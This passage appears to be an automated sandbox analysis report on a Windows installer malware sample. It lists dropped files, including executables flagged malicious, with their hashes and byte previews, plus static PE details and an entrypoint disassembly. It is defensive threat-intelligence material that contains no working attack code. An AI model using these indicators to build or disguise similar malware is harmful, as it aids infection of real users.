Preview:	MDMP....... .........b........................................./..........T.......8...........T...........................`...........L....................................................................U...........B..............GenuineIntelW...........T.......(.....b............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1A0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8346
Entropy (8bit):	3.6858392865250886
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiK116XN96YWvSUC4ifgmftOT68SWrSCpDf89byVBlsf7Gm:RrlsNis6X6Y+SUC4Sgmf6S6yyVB+fD
MD5:	095E417556FBE4145584D418DCF6B772
SHA1:	7AF7202D3C0351D630874D100EEDE623D47327BF
SHA-256:	3C92202F1721941A2905E51BAAE3EB4534BF0EBB3A7AB7969A61B67DAAF05222
SHA-512:	3F5A58855CE985EF2A5226794A332F158F71707F299C7B2A9BE61B801AD4FDB903EB43700A468F3FAFF0371F036B1E89036FF7963933ADCFCF7C0BD31870966B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.9.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA308.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4650
Entropy (8bit):	4.410251950610384
Encrypted:	false
SSDEEP:	48:cvIwSD8zsBJgtWI9dS5QWgc8sqYjk//8fm8M4J+BObEF++q8vXObhklIhydd:uITfT3HgrsqYocJ+SKEklIhydd
MD5:	4B7DDB96B8B77292E68B177EBDE4FA92
SHA1:	9A19F3FAAAE9BA6B2AFCFFB9055BD98EF3E25896
SHA-256:	D7AB333F19086F597AF1AA41A18DAB47BDDED01D1FBFEF932C1C555093FF0C2B
SHA-512:	BDC9E7B93900ECC95D87D517AAB7425672CCC6B694C34E15A2119BE0AFC65CE19A6CB15D9A7EC730592972892422D3D40FAD9315D4291A5DDA3546E11B418693
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519463" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE10.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue May 17 19:13:11 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	41278
Entropy (8bit):	1.9415856382736396
Encrypted:	false
SSDEEP:	192:iwZdW3ohUyOIL5oS5Z4Hibq5ArJoxlPvswzz88b:ZWYhaI1oQuCua9oxNgW
MD5:	258AB70E12285B780475C146205FD14F
SHA1:	F5C9B62229C750F054FF7D065C267BCDFEAD8D40
SHA-256:	EFA2A0726FBBBDA1E842F824DD795B00DFFCC0992119C09DDCE9B181A079AF09
SHA-512:	3C43991C0D4DC1D93689C5031A756191BCE771395C1005AB158B65A9B5EFD0EF27AF707CE7E8E43A2AE2118A7D2B5BD1F44443ACC8D72502DA11E73CF999DE78
Malicious:	false
Preview:	MDMP....... .........b........................(...............`/..........T.......8...........T...............n............................................................................................U...........B......x.......GenuineIntelW...........T.......<.....b............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC2F3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8346
Entropy (8bit):	3.6872385407442496
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNip91x6QX6YWCSU4zBqMWNpgmftOT68SWrSCpDy89bKxsfjOm:RrlsNipB6A6YzSU4zBqhgmf6S6ZKqfz
MD5:	C623C95F321454686EADE50D93287B6C
SHA1:	D167C75E937B33D651E21BFB26DFF7C62FA80A1B
SHA-256:	317D57818CCE1AE7415F4AA39164C546E3E88385E4054053E5559F38B4C10681
SHA-512:	149A92E70D4287CBC3C2B8D8FF82963520DAAB05F178259C7279004AC9AE7AF345296DBD30A00DDCC7F53BA9433EE3D1CE20BD20CF567B3AC781403B5D6362B4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.4.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4E8.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4650
Entropy (8bit):	4.409978521892262
Encrypted:	false
SSDEEP:	48:cvIwSD8zsBJgtWI9dS5QWgc8sqYjkr/8fm8M4J+BObEFNk+q8vXObLVlIhTd:uITfT3HgrsqYorkJ+uKilIhTd
MD5:	3F5A595F57FA4EC4A6A4016B5C86908B
SHA1:	10A4E08111C046E92EE7B4636DFAA5A2A3E7C252
SHA-256:	82151359BB9059E2032B55D407D5D34C00EB695F54A117C64DF7AC6497639D83
SHA-512:	08F6B1A621D2A876AC6B2537702C557E112AFAE25F9585BB370F623D6F340E66ADDD9D9DD982D9C67363225110EF44F42FFA1D5650A0F14AD574924E1D317370
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519463" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Temp\hjmxlwxk

Download File

Process:	C:\Users\user\Desktop\xeWd55M5Lb.exe
File Type:	data
Category:	dropped
Size (bytes):	7218
Entropy (8bit):	6.09068537307505
Encrypted:	false
SSDEEP:	192:NKZQlWjKlEs8sD3PyyS+B7G+H+h+iCykXh5SfHooOFK3/gWW+W2/pNAy/n5S:tLNld4fHo9Q47+W2HBS
MD5:	D4817E78989E590672F8031004C88864
SHA1:	299E84F2A32FA57AD733B4D8B3B680D5D339A623
SHA-256:	DF44088E83EB3E242467C34BC190C25E05F3CF1B9C5B1B7B368F35E7CCFBD4FB
SHA-512:	82463291532613DA4CA62703A68A68C2F402D89872106857B3914A13965E4BE0CAED8C713DDC8B478387661BC5AC5C035232B50CBAEA72403DDBF05951587943
Malicious:	false
Preview:	.y...D....,7(.Z...(.'.l:..(.'.l:..Z..:.e....Z...J..J.B:......F:.F..J..J.B:......F:.F..J..J.B:......F:.F..J..J.B:......F:.F..R.yW.#.5$.\|\|:..F:.F.D:...y..F:.F..D:.D..By...#.6.D:.\|.By.F:.(7FZ...#.......y.z.dZ..J.6.J.3.J..5.J..6.J.0.J.?..I.X.D..X.F..}...J..J..3D:..zF:.\|Z.....9.y.....y...DZ.?0D:.0?4....D....(.'.l:.D:.D.:.L}D:.D.D..Di.D9.yF.F:.D:.D.D..F.D:.D.....%w..P.K{..%{..i.%'.P.={..7{....%.1.P..{..9{....D...e.(.'.l:..:.....B:.F:..R..IwD:....D:.F:.D:.F:...z....I.D:..#.6$..F9.F).B:..#.6...F9.F).#{#.5$..B9z..%'.P..........F:..B:...J.....F:..R..I..Z..x.:.....D:...y.D.....(.'.l:..:.e...B:.F:..R..IwD:....D:.F:.D:.F:...y......C...D:..#.6$..F9..F).D:..#.6...F9..F).D:..#.6..F9..F).D:i..#.3$.\|F9j.F.j.B:..#.6..{F9..F).#z#.5$..B9z..%w..P..........F:..Ru.I.D:.D.uF.h.Ju.Ji.J..J..J.....F:..R..I..Z..x.:.....D:...i.*D...q.:.....B:.F:..R..IwD:....D:.F:.D:.F:...\|....I.D:..#.6$..F9..F).D:..#.6...F9..F).#{#.5$..B9z.%.1.P......a...F:...J..J....

C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Download File

Process:	C:\Users\user\Desktop\xeWd55M5Lb.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	6.193270446965403
Encrypted:	false
SSDEEP:	1536:GkUaNhhJfoI4yRkSzwxUWHQzdYgaeTcczegsWjcdOF:GWhzfOSzAezdnzMOF
MD5:	22A5EC1E72CE0D23B1598C40639BB3B2
SHA1:	44E54FBE0B56A243CFDC3BA01EC0B5D7D0252BAE
SHA-256:	525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
SHA-512:	1530704DBD2CEC6D811253FEF12995AD3BF739F1659F3C7634824EF412FB84592E33D751D1403C712FFB4BF034FFA7EF8C309C988241C92BB5D2445532653443
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 23%
Joe Sandbox View:	Filename: Payslip_APR_2022.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cZ..';..';..';..ik.?;..iU.(;..*ij.U;...C..>;..';...;....j.&;....T.&;..Rich';..........................PE..L......b..........................................@..........................p...............................................!..........................................................................@............................................text...F........................... ..`.rdata...L.......N..................@..@.data...,1...0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lcjspmd3kk4i8bc40b

Download File

Process:	C:\Users\user\Desktop\xeWd55M5Lb.exe
File Type:	data
Category:	dropped
Size (bytes):	279039
Entropy (8bit):	7.985547118986311
Encrypted:	false
SSDEEP:	6144:mE5rmm6/VUtpaEhhjj8c7pcERJmK7YeyuHa7fCwaE+37TR2+sOrKqy6K4qVJovjN:mEfZ/aEh9jtpNRJmwYJUjwaESA+HrKOn
MD5:	571129812363BF5751369230EDF0A747
SHA1:	D5EEDA388C78A4479453D70F2833969E712E2C5B
SHA-256:	B0ED7C04CF56F147615C69DA29D35A8D7F795F208B7DC15C66063188A26DEEF6
SHA-512:	3717BFD28789A53886141A1B9656F7FBAC25B666CCD3B6356D6A8C84EBF5CCE057C8BF95C664DFDF2F9DB8C3684BF95D6397BB8241A81A1F55A71A001412C1C7
Malicious:	false
Preview:	..?....s....P+.e..QI.b...5....H..._..x.M.#.l.S...t.#..$.!....d\.....[...0...$...YT...E....._I......Aw...#....A.:.....m..0..e.N=.p....Z.Qx^.\~...%.q.. .<qF3...o...N.`/.hE1.......?AJ+...SvC)P..$..\|.POY..z.....]..`{...c!.T..d..a......8.W.t...G.._J..JC..z+.j..QW...F/...H.._..xs4.#...S...t.#m.$.!..I.d.xy..6.L.....dt.DC.K.,\|.ph....+..$....[....`G.c.^....s...m..0.....).I..:-T..^.G....9\.q..^.$D....%..Y.gw...D.9..g.Wc.d.....=.U_.p..0... .I.~..F.8.4..C.!i.I.\|..)..:.P..s........Y.......t.NYG..\........+.j..QI.b...5....N..:....x.{.#.@.S.>.t....$.!..i.d.x..6.P..Udt....K.B..p..L..#..9....[....4G.C.c...s.".m.. .W3p..8^..>.T>.n.G.....\.q..^.$D....%...,g...D.9..g.Wc.d.....=.U_.p.m.... .I.~..F.8.4.C..i.I.\|..)..:.P..s........Y..8.W.t...G.........z+.j..QI.b...5....H..._..x.M.#.l.S...t.#..$.!..i.d.x.6.L..E..dt.D..K..\|.ph.L..#..9....[....4G.c.^...s...m..0.W....I..>.T>.n.G....9\.q..^.$D....%...,g...D.9..g.Wc.d.....=.U_.p.m.... .I.~..F.8.4*.C..i.I.\|..)..

C:\Users\user\AppData\Local\Temp\nsg494F.tmp

Download File

Process:	C:\Users\user\Desktop\xeWd55M5Lb.exe
File Type:	data
Category:	dropped
Size (bytes):	371399
Entropy (8bit):	7.74164846031575
Encrypted:	false
SSDEEP:	6144:CE5rmm6/VUtpaEhhjj8c7pcERJmK7YeyuHa7fCwaE+37TR2+sOrKqy6K4qVJovjg:CEfZ/aEh9jtpNRJmwYJUjwaESA+HrKOm
MD5:	5A68D6B8A8885F9D66B5FB1AC997AD05
SHA1:	1464557BEE7B00E85E4B0C23E626422FFB5C9677
SHA-256:	024571C42A870740BA742BE308E10C4DA75AEF4E801D77E0792827D423583836
SHA-512:	44A500BB57B03F9231A0DBC9A1B23E76FE9895AF88B19B978C8D571DB684FD9A026070140F032B35D9B3B671E215132B626C540551A4336C691CF29CF44D20C7
Malicious:	false
Preview:	.$......,...................F............#.......$..........................................................................................................................................................................................................................................G...................j...............................................................................................................................m.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
MD5:	32D0AAE13696FF7F8AF33B2D22451028
SHA1:	EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
SHA-256:	5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
SHA-512:	1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:kpW:kU
MD5:	6AF7523EDC75AEF1076801BAE4594FFB
SHA1:	419A20BB1C3ADD65EEB1C1A1C5EEFD57C5F370E5
SHA-256:	75EDFC9143462BD001AD32C8F8A232A4915CC48D1B5CA347E1C94B69F33B5FF2
SHA-512:	685468DD5BE2E4A96A2E7D2C9751081ACC259CF136218019F60CA152ADD42FA2C7A7E2FE3C4A92F931AA477FB570D09D03F3FE5489FBF27CFE9D16510CBE241F
Malicious:	true
Preview:	O..>98.H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.584962500721156
Encrypted:	false
SSDEEP:	3:9bzY6oRDJoTBn:RzWDqTB
MD5:	3FCC766D28BFD974C68B38C27D0D7A9A
SHA1:	45ED19A78D9B79E46EDBFC3E3CA58E90423A676B
SHA-256:	39A25F1AB5099005A74CF04F3C61C3253CD9BDA73B85228B58B45AAA4E838641
SHA-512:	C7D47BDAABEEBB8C9D9B31CC4CE968EAF291771762FA022A2F55F9BA4838E71FDBD3F83792709E47509C5D94629D6D274CC933371DC01560D13016D944012DA5
Malicious:	false
Preview:	9iH...}Z.4..f.....l.d

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.221928094887364
Encrypted:	false
SSDEEP:	3:9bzY6oRDMjmPl:RzWDMCd
MD5:	AE0F5E6CE7122AF264EC533C6B15A27B
SHA1:	1265A495C42EED76CC043D50C60C23297E76CCE1
SHA-256:	73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
SHA-512:	DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
Malicious:	false
Preview:	9iH...}Z.4..f..... 8.j....\|.&X..e.F.*.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe
File Type:	data
Category:	dropped
Size (bytes):	426840
Entropy (8bit):	7.999608491116724
Encrypted:	true
SSDEEP:	12288:zKf137EiDsTjevgA4p0V7njXuWSvdVU7V4OC0Rr:+134i2lp67i5d8+OCg
MD5:	963D5E2C9C0008DFF05518B47C367A7F
SHA1:	C183D601FABBC9AC8FBFA0A0937DECC677535E74
SHA-256:	5EACF2974C9BB2C2E24CDC651C4840DD6F4B76A98F0E85E90279F1DBB2E6F3C0
SHA-512:	0C04E1C1A13070D48728D9F7F300D9B26DEC6EC8875D8D3017EAD52B9EE5BDF9B651A7F0FCC537761212831107646ED72B8ED017E7477E600BC0137EF857AE2C
Malicious:	false
Preview:	..g&jo...IPg...GM....R>i...o...I.>.&.r{....8...}...E....v.!7.u3e.. .....db...}.......".t(.xC9.cp.B....7...'.......%......w.^.._.......B.W%.<..i.0.{9.xS...5...)..w..$..C..?`F..u.5.T.X.w'Si..z.n{...Y!m...RA...xg....[7...z..9@.K.-...T..+.ACe....R....enO.....AoNMT.\^....}H&..4I...B.:..@..J...v..rI5..kP......2j....B..B.~.T..>.c..emW;Rn<9..[.r.o....R[....@=...:...L.g<.....I..%4[.G^.~.l'......v.p&.........+..S...9d/.{..H.`@.1..........f.\s...X.a.].<.h...J4...k.x....%3.......3.c..?%....>.!.}..)(.{...H...3..`'].Q.[sN..JX(.%pH....+......(...v.....H...3..8.a_..J..?4...y.N(..D.h..g.jD..I...44Q?..N......oX.A......l...n?./..........$.!..;.^9"H...........OkF....v.m_.e.v..f...."..bq{.....O.-....%R+...-..P.i..t5....2Z# ...#...,L..{..j..heT -=Z.P;...g.m)<owJ].J..../.p..8.u8.&..#.m9...j%..g&....g.x.I,....u.[....>./W...........X...bZ...ex.0..x.}.....Tb...[..H_M._.^N.d&...g._."@4N.pDs].GbT.......&p........Nw...%$=.....{..J.1....2....<E{..<!G..

C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqenyeo.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	6.193270446965403
Encrypted:	false
SSDEEP:	1536:GkUaNhhJfoI4yRkSzwxUWHQzdYgaeTcczegsWjcdOF:GWhzfOSzAezdnzMOF
MD5:	22A5EC1E72CE0D23B1598C40639BB3B2
SHA1:	44E54FBE0B56A243CFDC3BA01EC0B5D7D0252BAE
SHA-256:	525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
SHA-512:	1530704DBD2CEC6D811253FEF12995AD3BF739F1659F3C7634824EF412FB84592E33D751D1403C712FFB4BF034FFA7EF8C309C988241C92BB5D2445532653443
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 23%
Joe Sandbox View:	Filename: Payslip_APR_2022.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cZ..';..';..';..ik.?;..iU.(;..*ij.U;...C..>;..';...;....j.&;....T.&;..Rich';..........................PE..L......b..........................................@..........................p...............................................!..........................................................................@............................................text...F........................... ..`.rdata...L.......N..................@..@.data...,1...0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.939038375304377
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	xeWd55M5Lb.exe
File size:	328454
MD5:	f32d1f6e94da654932e73e42f0f4773a
SHA1:	04e51bb4dedfc85cb6d4dfceb3bf48bf69c2a58a
SHA256:	43f670b439ef8ea9765ef3a61e84f1997e3dfd30067dc11c3203caf258553398
SHA512:	654f6732ab95aad2a8392a4359501d1758023676697c17928a891e1ce02298d93c795be59b683f0961b2b7c15fb4c498747bd03f90fdaefc1ed0caa900ad37ad
SSDEEP:	6144:ZYa6V3+v+HtdlL29jQwnq/c3Ffiy6d2W6zzHIn6pf43lYnkBItVb2slFQ6/gM:ZYD3+v2tP2Vnnq/4iy6wWazHM6FCmbtV
TLSH:	07642309A3E48477C4E391B04E37575EDFF91119AAF82A1B63512B8D7CA3340F26D3A1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x403640
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	61259b55b8912888e90f516ca08dc514

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A230h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080C8h]
mov esi, dword ptr [004080CCh]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FD154BB642Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FD154BB63FAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A318h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b000	0xa50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
